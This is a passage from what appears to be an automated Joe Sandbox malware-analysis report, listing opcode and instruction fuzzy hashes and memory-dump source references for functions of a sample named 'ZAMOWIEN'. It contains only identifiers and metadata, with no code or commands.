                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 55fdf07c94c3b51e394ed4b6910c108715fb44d7aee3e28a33531fadcda2d1d8
                                                                                  • Instruction ID: e8a4b76672936eae2e6f8305632349c3f4149464d46e93ff0ea9d0cf7b33de61
                                                                                  • Opcode Fuzzy Hash: 55fdf07c94c3b51e394ed4b6910c108715fb44d7aee3e28a33531fadcda2d1d8
                                                                                  • Instruction Fuzzy Hash: 9D214672182A41DFC722DF68CA51B59B7B5FF18718F14456CE00A9BA60CB38E811CF59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                  • Instruction ID: c0c8935942aa7ffd7b606ddee168b2c67ba91fa7f737c29c096cfd50eaa76523
                                                                                  • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                  • Instruction Fuzzy Hash: 9C21F9766067819BF3098799C991F1577D9EF847A4F0604E1EC008F653EB39DC41C7A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7659a29dc5ab2956e05ddd92c1ac63f2dcda6916d5e2fcb6f9d8f31bf815f775
                                                                                  • Instruction ID: d28d4cea18ed6fa34e1f35051681bfac854804d7b5b9f79504a874d01fd521a6
                                                                                  • Opcode Fuzzy Hash: 7659a29dc5ab2956e05ddd92c1ac63f2dcda6916d5e2fcb6f9d8f31bf815f775
                                                                                  • Instruction Fuzzy Hash: 4521C5B59102498BEB11CFAAC4647EE77A4EF8C328F168018D812A72D0CBBCA955C755
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1cd89947a9881d48d6a7377b2bfe0d6f8c50f81daef442ce147b9f50bd032768
                                                                                  • Instruction ID: c1dcf860d192b5898c013e76b02f406f36427d09aaac268b3bbec36164df95d9
                                                                                  • Opcode Fuzzy Hash: 1cd89947a9881d48d6a7377b2bfe0d6f8c50f81daef442ce147b9f50bd032768
                                                                                  • Instruction Fuzzy Hash: 5711DFB1621600AFDB15CB34CC44F4AB3A9EF84664F110819E445BB594E7B8F901CAA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e17270e2a092a915e86a4ff573c8516edeaa7a93291cfacb44734fbdb65724ff
                                                                                  • Instruction ID: 975847122bff39304aa5de406e81ecf2f49354318cbc51aaecb8776c6199f9cb
                                                                                  • Opcode Fuzzy Hash: e17270e2a092a915e86a4ff573c8516edeaa7a93291cfacb44734fbdb65724ff
                                                                                  • Instruction Fuzzy Hash: B811E6BA092642AAD7248F51CA82B7177F9EF9C794F100025E400FB350E63DDD23D766
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d313a98bf992f233d1f4211252d06bbace4d2b362aba2b7d967f7f1665c22d74
                                                                                  • Instruction ID: 2302bc1909a280e91fbc3c5cee66db5c7767ba6265c7c545adccc1ac3e8aa632
                                                                                  • Opcode Fuzzy Hash: d313a98bf992f233d1f4211252d06bbace4d2b362aba2b7d967f7f1665c22d74
                                                                                  • Instruction Fuzzy Hash: 1A115678241690DFE3148B28C8E8771B3E5EF4576CF08089AF8958FB61D769F985CE24
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5c37b503e218ef63c6b8745a42fe926baf7c544a8a7ec07d477c40a20732d257
                                                                                  • Instruction ID: 56da458b0f50639b093e89fb71778562a50eea31a6714c072d3e4c17ba2631f9
                                                                                  • Opcode Fuzzy Hash: 5c37b503e218ef63c6b8745a42fe926baf7c544a8a7ec07d477c40a20732d257
                                                                                  • Instruction Fuzzy Hash: D61104796107449FEF01CFA4C444B9AB7E7FF85264F144459DC56BB304D670E941CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1693a0b3a4eb086c96abfcd8ae10698d592b5099da1e7cff3e01d59fcfb2ebae
                                                                                  • Instruction ID: bf25ba2bb1eadedf998d307977a8d9192ea0782753775576b33b1abbc304be2a
                                                                                  • Opcode Fuzzy Hash: 1693a0b3a4eb086c96abfcd8ae10698d592b5099da1e7cff3e01d59fcfb2ebae
                                                                                  • Instruction Fuzzy Hash: E8212775A00649DFDF08CF98C490BECB3B1BF48329F60825AD425AA285CB796842CF90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                  • Instruction ID: a94291405765f3aeb466da16238834fa18b0d81f55818d5ad0d692ff26931b0c
                                                                                  • Opcode Fuzzy Hash: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                  • Instruction Fuzzy Hash: A1112532500208BFC7018F6CD8808BEB7B9EF99354F10806AF8849B250DB35CD55C765
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
                                                                                  • Instruction ID: 70cb76d0343bc20bdbf43d9e19a932e1d90e11165b499df9ff3dd52f75cf9349
                                                                                  • Opcode Fuzzy Hash: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
                                                                                  • Instruction Fuzzy Hash: 10016572600209BB9B04DBD6D956DAF77BDEF89654F004069B901DB100EB74EE05D774
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f6378e883190ac7278387b0ce93ac37d0363316efed2bc121a4505a6cff62c9
                                                                                  • Instruction ID: 1fc48a135a3850d9e437179aabe05980c67547fd841aca59beba6ca73a35152b
                                                                                  • Opcode Fuzzy Hash: 4f6378e883190ac7278387b0ce93ac37d0363316efed2bc121a4505a6cff62c9
                                                                                  • Instruction Fuzzy Hash: 011137B860424ADFD741CF18C480A95BBF5FB5E310F44929AE848CB301D735E890CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8886bf75d9b080366e6a7ae2712ef8aa2e39ef013685d632a2a52b0f9a630d73
                                                                                  • Instruction ID: 181147fbc68442c5e672be3f97ab522eb5fe0068c1f8cfc0b2d3fe7dd3e8607b
                                                                                  • Opcode Fuzzy Hash: 8886bf75d9b080366e6a7ae2712ef8aa2e39ef013685d632a2a52b0f9a630d73
                                                                                  • Instruction Fuzzy Hash: AB11ACB2600705EFE711CF68C965B9B77E8FF453A4F014429E989CB211D739E8008BA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ade7ddfe29d7db050930d6b28c854d75b77d48c230bb3892979f744a04b9d39
                                                                                  • Instruction ID: 62eefc62059e18052a2f559717b9d65bc3f841a6a7a0658ef531391ef04b83e2
                                                                                  • Opcode Fuzzy Hash: 0ade7ddfe29d7db050930d6b28c854d75b77d48c230bb3892979f744a04b9d39
                                                                                  • Instruction Fuzzy Hash: 0A11C2B5641748DBD710CFA9C954B9AB7BCBF49650F1004B9E500AB652DA39DD02CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d5b7c15d1eb60161d367e2c3ec37d0fcaf88b7700e6c1b3a823d619aec1178d8
                                                                                  • Instruction ID: bf72ae1ef425d1227cefc297775ea20905b15681e9fd760933f0809a2fbf9b59
                                                                                  • Opcode Fuzzy Hash: d5b7c15d1eb60161d367e2c3ec37d0fcaf88b7700e6c1b3a823d619aec1178d8
                                                                                  • Instruction Fuzzy Hash: 81118B35201240EFCB15DF19C990F567BB9FF98B94F2404A6EA059F661C639ED01CAA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
                                                                                  • Instruction ID: 414d0fc2986a37900d21e000fdcc5f2b3897c036505de43514858401fe38edea
                                                                                  • Opcode Fuzzy Hash: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
                                                                                  • Instruction Fuzzy Hash: 32012836210210DFEB088E29C8D0F9673AAAFC4620F1A55A5EE148F246EFB1DC41D751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4ff3da38cf08413570ccd2e390c2a1b6a22c06e738e69d764e3c82bced36564
                                                                                  • Instruction ID: 2669d0c3e18468ff5af7f0fbbf5238961c32979887e8b27c2b05339971ac2bad
                                                                                  • Opcode Fuzzy Hash: f4ff3da38cf08413570ccd2e390c2a1b6a22c06e738e69d764e3c82bced36564
                                                                                  • Instruction Fuzzy Hash: CD116171A01249EFCB00CFA9C945E9EBBF8EF44714F104066F900EB390D678DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
                                                                                  • Instruction ID: 2d7366797ced0fc04a931a85288ac6cf4eecb4f0cd0edc45cfef1b9e7b6568bb
                                                                                  • Opcode Fuzzy Hash: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
                                                                                  • Instruction Fuzzy Hash: D501F176240B01EFE722CA66C810AAB73EEFFC1660F04881DE9698F640DA74F401CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                  • Instruction ID: 2cd9f4c752b697f82f26914d5d219387a9daa04754251805bade00703d6c7de0
                                                                                  • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                  • Instruction Fuzzy Hash: C811AD32950B02CFE321CF25C8A0B22B3E4FF54772F158869D5894B4A2C778E881CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9774c63fabbcf2aea5744b1be7ad343733d9a7ac2bb4c56c93fb0b9bace3df40
                                                                                  • Instruction ID: 168b79d2557372b66210a31e2c2e8536665f91fc9218c9f106c0051c6790d24c
                                                                                  • Opcode Fuzzy Hash: 9774c63fabbcf2aea5744b1be7ad343733d9a7ac2bb4c56c93fb0b9bace3df40
                                                                                  • Instruction Fuzzy Hash: 4F015E71A41208AFDB04DFA9D846EAEBBBCEF45714F504066F900EB380DA78DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d5ac3983c9a7a6cbb4cbbd8a6d444fa0ddb0bc6b7fbeb427d60642703f536c4
                                                                                  • Instruction ID: 6672711681ace01a8ef5ceab3edc4c79fc1d4218690b8b59c8a40c6a10167413
                                                                                  • Opcode Fuzzy Hash: 1d5ac3983c9a7a6cbb4cbbd8a6d444fa0ddb0bc6b7fbeb427d60642703f536c4
                                                                                  • Instruction Fuzzy Hash: 82015271A41208ABDB14DFA9D846FAEBBBCEF44710F404066F910EB280DA78DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b37360908b74d5f87b0e461eaee6aa4e8a2fb426882ba9ab039e712887badff
                                                                                  • Instruction ID: 4f74362ad24cd4ac2ae4685df6fc801c5d94f172c1e684a074b9913550c2ef3e
                                                                                  • Opcode Fuzzy Hash: 1b37360908b74d5f87b0e461eaee6aa4e8a2fb426882ba9ab039e712887badff
                                                                                  • Instruction Fuzzy Hash: 9F015271A41248EBDB04DFA9D84AEAEB7B8EF44710F044056F904EB280D778DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c611a083114ef7d6f79c72feefe0b5ada3aec4e7a39cd99fe235ea50b25597f1
                                                                                  • Instruction ID: 10774d72a111beecba02e7b634aab46a14630a23afa1c9741d142349848b2ae1
                                                                                  • Opcode Fuzzy Hash: c611a083114ef7d6f79c72feefe0b5ada3aec4e7a39cd99fe235ea50b25597f1
                                                                                  • Instruction Fuzzy Hash: A8015271A41208EBDB14DFA9D846EAEB7BCEF48710F004056F914EB280D678DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                                  • Instruction ID: 213e0c2a83ca49fd242933e7960441e7391a1007bdd0d28a51ab470cbad2a895
                                                                                  • Opcode Fuzzy Hash: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                                  • Instruction Fuzzy Hash: BF018173700645EBCB11DAABEE24A9F77ACAFC8790F800029B915D7150DE35E911C7A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c482757a6a011e354ce0566746eaca431d5f21d211743093932f460beafd4eb2
                                                                                  • Instruction ID: 9ad4576f91d55df36b6bbb8f8a92b6d74f038df23abd33bf0d03e3fe3b615f36
                                                                                  • Opcode Fuzzy Hash: c482757a6a011e354ce0566746eaca431d5f21d211743093932f460beafd4eb2
                                                                                  • Instruction Fuzzy Hash: 33014C70A01248ABDB04DBA9D846EAEBBB8EF45714F404466F900EB280DA78DA01CB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                  • Instruction ID: a5ce990257d67a42747556624b7f75560a33dfa566c3e26f715a967271d7837b
                                                                                  • Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                  • Instruction Fuzzy Hash: 6E01D476605744ABE7018B24DC08B2973DADBC4A74F114959ED249F380EFB9E941CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 838bce743b102303a3544e4f9f305518d06da8c51d6d4c822662159881bf861c
                                                                                  • Instruction ID: 833b531a093b8be1e28309164cddcc9188053d977a0b5650dcd3b4b2b903e4ae
                                                                                  • Opcode Fuzzy Hash: 838bce743b102303a3544e4f9f305518d06da8c51d6d4c822662159881bf861c
                                                                                  • Instruction Fuzzy Hash: B101BC72605684DFE312C769CA58F2677EDEB44BA0F0944A1F818DBA56D728EC40C661
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a54ff7bea1ca70891d63560cce7ccbd015a5627a4c091be90357d9441758474
                                                                                  • Instruction ID: 3a213281e96c0a513894db99ffacd46b16ef60324347df6d460c2ce5530b93ee
                                                                                  • Opcode Fuzzy Hash: 1a54ff7bea1ca70891d63560cce7ccbd015a5627a4c091be90357d9441758474
                                                                                  • Instruction Fuzzy Hash: 29018471A00218EBDB10DBA5D949FAEB7B8EF84704F004066F500EF280D678D901CBA5
                                                                                  Memory Dump Source
